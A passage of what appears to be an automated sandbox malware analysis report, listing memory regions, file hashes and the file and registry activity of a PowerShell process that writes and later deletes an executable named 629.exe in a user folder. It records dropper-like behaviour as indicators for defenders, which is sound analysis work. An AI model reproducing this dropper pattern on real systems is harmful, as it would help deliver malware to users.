| microsoft.powershell.commands.management.ni.dll | 0x7fedfc50000 | 0x7fedfd67fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedfd70000 | 0x7fedff85fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fedff90000 | 0x7fee0074fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee0080000 | 0x7fee0129fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee0240000 | 0x7fee056dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee0570000 | 0x7fee10ccfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee10d0000 | 0x7fee1af2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee1b00000 | 0x7fee29dbfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee29e0000 | 0x7fee337cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee35a0000 | 0x7fee3608fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee3610000 | 0x7fee36c1fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5ab0000 | 0x7fee5b48fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee5b50000 | 0x7fee5bbefff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fef2a20000 | 0x7fef2a51fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef82d0000 | 0x7fef82dbfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef82e0000 | 0x7fef8313fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef8d70000 | 0x7fef8deffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef8e70000 | 0x7fef8e7efff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefa5e0000 | 0x7fefa636fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb0d0000 | 0x7fefb0dafff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb100000 | 0x7fefb118fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefb4a0000 | 0x7fefb4ccfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefbe50000 | 0x7fefbea5fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefbeb0000 | 0x7fefbfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc030000 | 0x7fefc223fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefc6f0000 | 0x7fefc6fbfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefc8d0000 | 0x7fefc8edfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefcb20000 | 0x7fefcb66fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefce20000 | 0x7fefce36fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd320000 | 0x7fefd342fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefd530000 | 0x7fefd53efff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefd6c0000 | 0x7fefd6d9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd8c0000 | 0x7fefd8f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefdcf0000 | 0x7fefdd60fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefde50000 | 0x7fefebd7fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feff4e0000 | 0x7feff531fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff650000 | 0x7feff826fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 75 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\629.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\aETAdzjz\629.exe | 144.00 KB |
MD5:
02ee3587135f33d8b7bff25b34260089
SHA1: 3f4b9a41b65d9f155ac43260ac8f25857e656c61 SHA256: d138b4bc0dafd951ab483196984d648ce96eb092262fdc8baf94991725bdb0ea SSDeep: 3072:5SnHpm9x+scCgsrv8k2WoB0aodZzyEeYo40Zs+AMQA:GpEx+s/gGvB2WjzjeYo4a |
|
|
Host Behavior
File (133)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\629.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\629.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
7 | |
| Get Info | C:\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\629.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\629.exe | type = file_type |
|
4 | |
| Get Info | C:\Users\aETAdzjz\629.exe | type = file_attributes |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
26 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
5 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 1227 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 4096 |
|
4 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 8564 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 15571 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 10977 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 5407 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 16384 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 33672 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 15168 |
|
1 | |
| Write | C:\Users\aETAdzjz\629.exe | size = 25329 |
|
1 | |
| Delete | C:\Users\aETAdzjz\629.exe | - |
|
2 |
Registry (211)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
